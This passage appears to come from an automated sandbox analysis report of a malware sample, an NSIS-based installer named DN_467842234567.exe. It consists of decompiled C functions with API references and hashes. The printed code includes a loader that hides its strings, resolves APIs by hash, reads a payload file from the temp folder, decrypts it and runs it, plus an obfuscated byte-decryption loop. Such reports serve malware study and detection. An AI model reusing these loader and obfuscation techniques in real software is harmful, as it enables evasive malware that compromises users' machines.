                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 72916486
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ContextCreateProcessThread
                                            • String ID: D
                                            • API String ID: 2843130473-2746444292
                                            • Opcode ID: da00999530487616c1ccdebd63cdfd8852f2794cc51f7ae7a9d77ae83a17db7f
                                            • Instruction ID: c029e02bd4e8a23a22cf0f0a7cdbfe6b0d8457ba168e9e530c970ad208f6e585
                                            • Opcode Fuzzy Hash: da00999530487616c1ccdebd63cdfd8852f2794cc51f7ae7a9d77ae83a17db7f
                                            • Instruction Fuzzy Hash: D0A10870E0010EEFDB51DFA9C980BAEBBB9AF08305F1440A9E516E7294E7319A51DF52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                            0x00405f00
                                            0x00405f09
                                            0x00405f0b
                                            0x00405f0b
                                            0x00405f0f
                                            0x00405f21
                                            0x00405f1b
                                            0x00405f1b
                                            0x00405f1b
                                            0x00405f25
                                            0x00405f39
                                            0x00405f4d
                                            0x00405f54

                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                            • wsprintfA.USER32 ref: 00405F39
                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                            • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                            • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                            • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                            0x004058d1
                                            0x004058d7
                                            0x004058d8
                                            0x004058d8
                                            0x004058d9
                                            0x004058e0
                                            0x004058ea
                                            0x004058f7
                                            0x004058fa
                                            0x00405902
                                            0x00000000
                                            0x00000000
                                            0x00405906
                                            0x00000000
                                            0x00000000
                                            0x00405908
                                            0x00000000
                                            0x00405908
                                            0x00000000

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 004058E0
                                            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\DN_467842234567.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-3895641878
                                            • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                            • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                            • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                            • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729152E8, Relevance: 7.7, APIs: 5, Instructions: 187fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E729152E8() {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				long _v116;
				short _v1156;
				short _t80;
				short _t81;
				short _t82;
				short _t83;
				short _t84;
				short _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t105;
				short _t106;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				void* _t125;
				signed int _t126;
				void* _t127;
				int _t129;
				void* _t132;

				_t80 = 0x53;
				_v44 = _t80;
				_t81 = 0x68;
				_v42 = _t81;
				_t82 = 0x6c;
				_v40 = _t82;
				_t83 = 0x77;
				_v38 = _t83;
				_t84 = 0x61;
				_v36 = _t84;
				_t85 = 0x70;
				_v34 = _t85;
				_t86 = 0x69;
				_v32 = _t86;
				_t87 = 0x2e;
				_v30 = _t87;
				_t88 = 0x64;
				_v28 = _t88;
				_t89 = 0x6c;
				_v26 = _t89;
				_t90 = 0x6c;
				_v24 = _t90;
				_v22 = 0;
				_v12 = _v12 & 0x00000000;
				_v8 = E729159AF();
				_v80 = E72915A5E(_v8, 0x7fc01dae);
				_v112 = E72915A5E(_v8, 0xff7f721a);
				_v76 = E72915A5E(_v8, 0x7fd6a366);
				_v84 = E72915A5E(_v76( &_v44), 0x7f5a653a);
				_v108 = E72915A5E(_v8, 0x7f91a078);
				_v88 = E72915A5E(_v8, 0x7fe63623);
				_v92 = E72915A5E(_v8, 0x7fbd727f);
				_v96 = E72915A5E(_v8, 0x7fb47add);
				_v100 = E72915A5E(_v8, 0x7fe7f840);
				_t142 = _v8;
				_v104 = E72915A5E(_v8, 0x7fe1f1fb);
				_t105 = 0x68;
				_v72 = _t105;
				_t106 = 0x65;
				_v70 = _t106;
				_t107 = 0x79;
				_v68 = _t107;
				_t108 = 0x64;
				_v66 = _t108;
				_t109 = 0x6c;
				_v64 = _t109;
				_t110 = 0x61;
				_v62 = _t110;
				_t111 = 0x76;
				_v60 = _t111;
				_t112 = 0x31;
				_v58 = _t112;
				_t113 = 0x6d;
				_v56 = _t113;
				_t114 = 0x65;
				_v54 = _t114;
				_t115 = 0x33;
				_v52 = _t115;
				_t116 = 0x6d;
				_v50 = _t116;
				_t117 = 0x33;
				_v48 = _t117;
				_v46 = 0;
				_v80(0x103,  &_v1156);
				_v84( &_v1156,  &_v72);
				_t125 = CreateFileW( &_v1156, 0x80000000, 7, 0, 3, 0x80, 0);
				_v20 = _t125;
				if(_v20 != 0xffffffff) {
					_t126 = _v92(_v20, 0);
					_v12 = _t126;
					if(_v12 != 0xffffffff) {
						_t127 = VirtualAlloc(0, _v12, 0x3000, 4);
						_v16 = _t127;
						if(_v16 != 0) {
							_t129 = ReadFile(_v20, _v16, _v12,  &_v116, 0);
							if(_t129 != 0) {
								FindCloseChangeNotification(_v20);
								_v16 = E72915CE2(_t142, _v16, _v12);
								_t132 = E72915FF7(_v16); // executed
								ExitProcess(0);
							}
							return _t129;
						}
						return _t127;
					}
					return _t126;
				}
				return _t125;
			}










































































                                            0x72915ad0
                                            0x72915ad1
                                            0x72915ad7
                                            0x72915ad8
                                            0x72915ade
                                            0x72915adf
                                            0x72915ae5
                                            0x72915ae6
                                            0x72915aec
                                            0x72915aed
                                            0x72915af3
                                            0x72915af4
                                            0x72915afa
                                            0x72915afb
                                            0x72915b01
                                            0x72915b02
                                            0x72915b08
                                            0x72915b09
                                            0x72915b0f
                                            0x72915b10
                                            0x72915b16
                                            0x72915b17
                                            0x72915b1d
                                            0x72915b21
                                            0x72915b2a
                                            0x72915b3a
                                            0x72915b4a
                                            0x72915b5a
                                            0x72915b70
                                            0x72915b80
                                            0x72915b90
                                            0x72915ba0
                                            0x72915bb0
                                            0x72915bc0
                                            0x72915bc8
                                            0x72915bd0
                                            0x72915bd5
                                            0x72915bd6
                                            0x72915bdc
                                            0x72915bdd
                                            0x72915be3
                                            0x72915be4
                                            0x72915bea
                                            0x72915beb
                                            0x72915bf1
                                            0x72915bf2
                                            0x72915bf8
                                            0x72915bf9
                                            0x72915bff
                                            0x72915c00
                                            0x72915c06
                                            0x72915c07
                                            0x72915c0d
                                            0x72915c0e
                                            0x72915c14
                                            0x72915c15
                                            0x72915c1b
                                            0x72915c1c
                                            0x72915c22
                                            0x72915c23
                                            0x72915c29
                                            0x72915c2a
                                            0x72915c30
                                            0x72915c40
                                            0x72915c4e
                                            0x72915c6a
                                            0x72915c6d
                                            0x72915c74
                                            0x72915c7d
                                            0x72915c80
                                            0x72915c87
                                            0x72915c97
                                            0x72915c9a
                                            0x72915ca1
                                            0x72915cb4
                                            0x72915cb9
                                            0x72915cc0
                                            0x72915cce
                                            0x72915cd4
                                            0x72915cdb
                                            0x72915cdb
                                            0x00000000
                                            0x72915cb9
                                            0x00000000
                                            0x72915ca1
                                            0x00000000
                                            0x72915c87
                                            0x00000000

                                            APIs
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72915C6A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 62ca3983de03888d76cb4852d7001652b4c6a4858588101cbdb10bbab4cb0b1d
                                            • Instruction ID: 02703a9f70aeef49099e67e9a808f2171f353334ad943e3fb0e3dfd7337a61fb
                                            • Opcode Fuzzy Hash: 62ca3983de03888d76cb4852d7001652b4c6a4858588101cbdb10bbab4cb0b1d
                                            • Instruction Fuzzy Hash: A4615B31E5030DEEDB50CFE8E851BEDBBB5AF48710F20945AE618EA2D0E7710A45DB46
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 60%
                                            			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                            0x00401f84
                                            0x00401f84
                                            0x00401f89
                                            0x00401f90
                                            0x0040204c
                                            0x00402197
                                            0x00402197
                                            0x004028be
                                            0x004028c1
                                            0x004028cd
                                            0x004028cd
                                            0x00401f9f
                                            0x00401fa9
                                            0x00401fac
                                            0x00401fbb
                                            0x00401fbf
                                            0x00401fc5
                                            0x00401fc9
                                            0x00402045
                                            0x00000000
                                            0x00402045
                                            0x00401fcb
                                            0x00401fd5
                                            0x00401fd9
                                            0x0040201d
                                            0x00401fdb
                                            0x00401fde
                                            0x00401fe1
                                            0x00402011
                                            0x00401fe3
                                            0x00401fe6
                                            0x00401fef
                                            0x00401ff1
                                            0x00401ff1
                                            0x00401fef
                                            0x00401fe1
                                            0x00402025
                                            0x0040203a
                                            0x0040203a
                                            0x00000000
                                            0x00402025
                                            0x00401faf
                                            0x00401fb5
                                            0x00401fb9
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041CC48,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                              • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,73BCEA30), ref: 00404F0F
                                              • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                              • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                                              • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                                              • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                            • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                            • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                            • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                            0x004015b3
                                            0x004015ba
                                            0x004015bd
                                            0x004015c2
                                            0x004015c6
                                            0x004015c8
                                            0x004015d0
                                            0x004015d2
                                            0x004015d4
                                            0x004015d8
                                            0x004015db
                                            0x004015f3
                                            0x004015f4
                                            0x004015dd
                                            0x004015dd
                                            0x004015e0
                                            0x00000000
                                            0x004015eb
                                            0x004015ec
                                            0x004015ec
                                            0x004015e0
                                            0x004015fb
                                            0x00401602
                                            0x0040160f
                                            0x0040160f
                                            0x00401604
                                            0x00401605
                                            0x0040160d
                                            0x00000000
                                            0x00000000
                                            0x0040160d
                                            0x00401602
                                            0x00401612
                                            0x00401615
                                            0x00401617
                                            0x00401618
                                            0x004015c8
                                            0x0040161f
                                            0x0040164a
                                            0x00402197
                                            0x00401621
                                            0x00401623
                                            0x0040162e
                                            0x00401634
                                            0x0040163c
                                            0x00401642
                                            0x00401642
                                            0x0040163c
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                              • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                              • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                              • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                              • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 1892508949-47812868
                                            • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                            • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                            • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                            • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401389, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 69%
                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x5f6f2c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}












                                            0x0040138a
                                            0x004013fa
                                            0x00401392
                                            0x0040139b
                                            0x004013a0
                                            0x00000000
                                            0x00000000
                                            0x004013a2
                                            0x004013a3
                                            0x004013ad
                                            0x00000000
                                            0x00401404
                                            0x004013b0
                                            0x004013b7
                                            0x004013bd
                                            0x004013be
                                            0x004013c0
                                            0x004013c2
                                            0x004013b9
                                            0x004013b9
                                            0x004013ba
                                            0x004013ba
                                            0x004013c9
                                            0x004013cb
                                            0x004013f4
                                            0x004013f4
                                            0x004013c9
                                            0x00000000

                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32 ref: 004013F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ,o_
                                            • API String ID: 3850602802-3618069915
                                            • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                            • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                            • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                            • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729122E0, Relevance: 3.2, APIs: 2, Instructions: 171memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E729122E0(void* __ecx) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				void* _t109;
				int _t112;
				void* _t146;

				_t146 = __ecx;
				_v16 = 0;
				_t109 = VirtualAlloc(0, 0xbebc200, 0x3000, 4); // executed
				_v16 = _t109;
				if(_v16 != 0) {
					E72912550(_t146, _v16, 0xbebc200);
					_v12 = 0;
					_v12 = 0;
					while(_v12 < 0x1301) {
						_t11 = E729152E8 + _v12; // 0x0
						_v5 =  *_t11;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = (_v5 & 0x000000ff) + 0x6c;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0xd7;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x1b;
						_v5 = _v5 & 0x000000ff ^ 0x00000051;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 = (_v5 & 0x000000ff) - 0xd3;
						_v5 = _v5 & 0x000000ff ^ 0x0000005c;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ 0x000000fa;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0xa0;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000051;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = (_v5 & 0x000000ff) + 0xda;
						_v5 = _v5 & 0x000000ff ^ 0x00000062;
